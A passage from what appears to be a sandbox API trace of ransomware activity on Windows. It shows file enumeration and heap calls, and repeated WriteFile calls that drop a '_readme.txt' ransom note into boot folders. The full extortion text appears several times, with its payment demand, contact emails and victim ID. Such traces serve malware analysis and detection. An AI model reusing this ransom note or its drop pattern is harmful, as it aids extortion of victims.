\"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", cchWideChar=-1, lpMultiByteStr=0x49db7d8, cbMultiByte=2140, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH", lpUsedDefaultChar=0x0) returned 1117 [0127.939] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x49dc040 [0127.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49db7d8 | out: hHeap=0x4970000) returned 1 [0127.939] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.939] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-egvXx8HqOt\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0272omflAsdhkisM3b5iAX90sVMro14qQ04lMqIJfiyOzbNOeg5qJH") returned 1116 [0127.939] WriteFile (in: hFile=0x5c4, lpBuffer=0x49dc040*, nNumberOfBytesToWrite=0x45c, lpNumberOfBytesWritten=0xe00fb64, lpOverlapped=0x0 | out: lpBuffer=0x49dc040*, lpNumberOfBytesWritten=0xe00fb64*=0x45c, lpOverlapped=0x0) returned 1 [0127.940] CloseHandle (hObject=0x5c4) returned 1 [0127.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49dc040 | out: hHeap=0x4970000) returned 1 [0127.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd3390 | out: hHeap=0x4970000) returned 1 [0127.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd2c688 | out: hHeap=0x4970000) returned 1 [0127.940] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2b08 | out: hHeap=0x4970000) returned 1 [0127.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.941] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37adf20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37adf20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x49a4880 [0127.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.941] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xe37adf20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37adf20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0127.941] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0127.941] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37adf20, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe37adf20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37adf20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0127.941] FindNextFileW (in: hFindFile=0x49a4880, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe37adf20, ftCreationTime.dwHighDateTime=0x1d6d58a, ftLastAccessTime.dwLowDateTime=0xe37adf20, ftLastAccessTime.dwHighDateTime=0x1d6d58a, ftLastWriteTime.dwLowDateTime=0xe37adf20, ftLastWriteTime.dwHighDateTime=0x1d6d58a, nFileSizeHigh=0x0, nFileSizeLow=0x45c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0127.941] FindClose (in: hFindFile=0x49a4880 | out: hFindFile=0x49a4880) returned 1 [0127.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce92c8 | out: hHeap=0x4970000) returned 1 [0127.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce92c8 [0127.941] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0127.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.941] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.941] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.942] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.942] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.943] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.943] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.944] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.944] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc2e) returned 0x7516fe8 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x860) returned 0x7516fe8 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.945] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.945] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x840) returned 0xdcd2280 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.946] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.946] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x830) returned 0xdcd2280 [0127.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0xc46) returned 0x7516fe8 [0127.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdcd2280 | out: hHeap=0x4970000) returned 1 [0127.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x7516fe8 | out: hHeap=0x4970000) returned 1 [0127.947] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce9ed0 | out: hHeap=0x4970000) returned 1 [0127.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x20) returned 0xdce9ed0 [0127.947] RtlAllocateHeap (HeapHandle=0x4970000, Flags=0x0, Size=0x820) returned 0xdcd2280 [0127.947] PathFindFileNameW (pszPath="C:\\Boot\\fi-FI\\") returned="fi-FI\\" [0127.947] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0127.947] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0127.948] PathFindFileNameW (pszPath="") returned="" [0127.948] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x7516fe8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0127.948] PathAppendW (in: pszPath="C:\\Boot\\fi-FI\\", pMore="_readme.txt" | out: 